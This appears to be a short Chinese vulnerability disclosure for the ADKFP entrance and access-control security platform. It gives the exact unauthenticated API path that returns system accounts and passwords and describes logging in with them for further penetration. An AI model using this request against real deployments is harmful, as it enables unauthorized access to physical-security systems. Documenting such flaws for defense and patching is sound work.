费浦门禁出入口安防平台aDKManageUser存在未授权访问

一、漏洞简介

ADKFP门禁出入口综合安防管理平台,企业出入口系统采用两级运营管理方式,即“集中控制,分散管理”的方式实现企业管理中心和各企业合作运营的管理模式。 企业出入口系统的所有功能,都是以功能模块的形式提供。模块化的好处是能适应用户的需求,系统可任意搭配,互相配合,能够组合式适应用户需要,与用户的管理模式紧密结合。系统覆盖基础平台、身份信息平台、设备管理、门禁管理、考勤管理、访客管理、车辆门禁、电子门锁管理、移动端管理,智能办公模块包含智能迎宾、会议签到、布控抓拍、报警信息推送等多个应用子系统,所有子系统可实现信息共享,统一服务于整个企业出入口平台。 ADKFP门禁出入口综合安防管理平台存在接口未授权访问,可通过访问接口获取系统账号及密码,进而登录系统后台进行下一步渗透。

二、影响版本

三、资产测绘

1706857311657-f58b56c0-f770-4251-a2a0-1787c92a822c.png

四、漏洞复现

/aDKManageUser/selectCll_2?roleId=2&page=1&limit=10

1706857390853-836d88a9-ebf3-4edb-8182-9f83e003069d.png

使用泄漏的账号密码登陆系统

1706857658157-491df212-b97a-4a02-bfe1-32ff502f5d00.png

更新: 2024-02-29 23:57:11
原文: https://www.yuque.com/xiaokp7/ocvun2/ox6ro65l6vgz2hl5